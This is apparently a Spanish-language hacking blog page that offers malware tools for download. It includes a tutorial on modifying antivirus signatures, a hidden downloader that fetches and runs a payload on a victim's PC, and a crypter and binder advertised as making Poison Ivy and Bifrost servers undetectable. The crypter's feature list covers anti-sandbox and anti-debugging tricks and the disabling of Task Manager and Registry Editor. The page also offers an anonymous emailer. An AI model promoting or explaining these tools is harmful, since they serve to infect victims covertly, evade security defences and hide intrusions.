December 03
En este tutorial de 23 paginas se enseña uno de los metodos mas efectivos para burlar los antivirus, se trata de la modificacion de sus firmas maliciosas.
Este metodo requiere algo de paciencia pero vale la pena por sus resultados.
El manual esta muy completo, bien explicado y con muchas imagenes, tambien esta disponible la descarga de las herramientas que se utilizan.
Descargas
Manual (megaupload)
Herramientas (megaupload)
PASS: http://www.octalh.mx.gs
Manual (rapidshare)
Herramientas (rapidshare)
PASS: http://octalh.33host.com
Les presento la primera version del Downloader de Sharki, bien basico y efectivo, ademas al dia de hoy es indetectable.
La funcion de los downloaders es basicamente descargar y ejecutar un archivo desde un servidor web en la pc victima ocultamente.
Generalmete se utiliza un downloader cuando se quiere ejecutar un archivo muy pesado en la pc de la victima, y no hay forma de mandarlo por msn o por correo devido a su peso.
Para usarlo simplemente subimos el malware que queremos que se descargue y ejecute en la pc de la victima a cualquier hosting web que soporte descarga directa de .exe por ejemplo, miarroba.com o googlepages.
En donde dice URL colocamos la direccion completa donde se ubica nuestro archivo (ej: troyanisandoo.webcindario.com/bicho.exe)
Seguidamene damos click en crear servidor, el archivo creado sera el servidor que se enviara a la victima.
Cuando sea ejecutado por la victima se descargara el archivo bicho.exe desde nuestro servidor web y se ocultara en su carpeta windows, apenas termine de descargarse se ejecutara.
Descarga:
SharkI Downloader (rapidshare)
SharkI Downloader (mediafire)
Elite Protector es una nueva herramienta creada en Turquia por WHO!, basicamente sirve para proteger tus archivos. Es ideal para los que trabajan con malware, y HOY en dia es la mejor herramienta que existe del estilo. Ya no se nesesitara tener a mano 10 herramientas para trabajar con tu malware y dejarlo indetectable. Elite protector trae todo en una sola aplicacion, encripta tu aplicacion y la deja 100% indetectable a todos los antivirus, hasta se saltea la defensa proactiva del Kaspersky 2009 y los firewalls.
Incluye un binder para juntar tu malware con cualquier archivo, ya sea una foto, video o cualquier aplicacion, Cambia el icono, agrega mensajes de error durante la ejecucion, agrega metodos de ocultacion, desabilita objetos en la pc victima, protege tu server de SandBoxes y de maquinas virtuales, comprime con UPX y FSG, y muchisimo mas.
Esto no es nada comparado con todo lo que tiene esta poderosa herramienta. A continuacion informacion mas detallada de sus propiedades.
Propiedades
-Opciones
*Anti sandboxie
*Anti Maquinas virtuales
*Bypass defensa Proactiva del kaspersky
*Comprimir el archivo (UPX,FSG,UCL..)
*Ejecutar oculto
*Melt (Borrar archivo al ejecutar)
*Ejecucion en memoria.
*Conservar EOF data
*Realinear PE header
*Eliminar los recursos no utilizados
*Establecer atributos de archivo +H y +S
*Universal Anti Sandboxes
*Validar PE header
*Incrementar sitio con bytes
*Anti VMware
*Anti Anubis sandbox
*Anti Norman sandbox
*Anti CW sandbox
*Anti sunblet sandbox
*Anti "is debug present"
*Anti Thread expert
*Anti JoeBox
*Anti Olly Debug
*Anti Filemon
*Anti Regmon
*Anti Procmon
*Inyectar el archivo en un proceso especifico (FWB+)
-Explorador por defecto
-Seleccionar
*Drop del archivo
-Nombre de archivo:
-Cambiar atributos del archivo (oculto, solo lectura y sistema)
*Cambiar la fecha del archivo por una mas antigua
*Cambiar la extension del archivo
*Proteger el archivo con contraseña
*Desactivar modo a prueba de errores
*Desactivar Administrador de tareas
*Desactivar editor de registro
*Desactivar Restauracion de sistema
*Desactivar Regedit
*Desactivar Ejecutar
*Desactivar Escritorio
*Desactivar Barra de herramientas
*Desactivar Boton inicio
*Desactivar MsConfig
-Configurar cuadro de mensajes
-Icono
*Mantiene icono original
*Sin icono (ahorra unos pocos Kbs)
*Reemplazar el icono (32 Bits)
-Multi Encriptacion
-Llave de encriptacion aleatoria
-Juntar con uno o mas archivos
A continuacion algunas imagenes del programa
Stub Publico - Gratis
El stub publico es un "Simple XOR", es totalmente gratis y al dia de hoy deja un 99% indetectable el server del Poison Ivy y del Bifrost, pero en unos dias este se tornara detectado y ya no dejara indetectable las aplicaciones encriptadas. Por tal motivo si deseas comprar un Stub privado lee mas abajo.
Descarga:
Elite Protector v1.0 Public (mediafire)
Elite Protector v1.0 Public (badongo)
Elite Protector v1.0 Public (rapidshare)
Bueno os presento mi pekeña y ultima creacíón que he hecho.
Se llama SharkI IP y sirve para cambiar la IP actual!
Por ejemplo si nos banean de un foro un minichat o algo esta es la solucion
DESCARGALO AQUI
Pos nada aqui les traigo una aplicación creada para enviar e-mails "anonomamente", no es nada de otro mundo pero funciona bien,
bueno es si los envia desde el servidor de lycos pero nunca se sabra de donde proviene el mensaje enviado, se pueden mandar todos los mensajes que quieran a un mismo destinatario..Solo que cuando el servidor de lycos esta cargado se demora un poco más. Esta hecho en VB y batch...Cualquier bug lo reportan para poder arreglarlo.
DESCARGALO AQUI
Tools 
Help
O.o%c2%b0%c2%b8.%c2%b7%c2%b4%c2%af%60%c2%b7.%c2%b8%3e%3c((((%c2%ba%3e%e2%80%a2-)%e2%80%a2%e2%80%93%e2%80%93%e2%80%93%e2%80%93+(%c2%af%60%c2%b7%c2%b8%e2%80%a2%c2%b4%c2%af)+%3c%c2%ba))))%3e%3c.%c2%b7%c2%b4%c2%af%60%c2%b7.+(%c2%af%60%c2%b7._)+%2c.-%7e*'%c2%a8%c2%af%c2%a8'*%c2%b7%7e+-+Windows+Live&referrer=){kind=small}
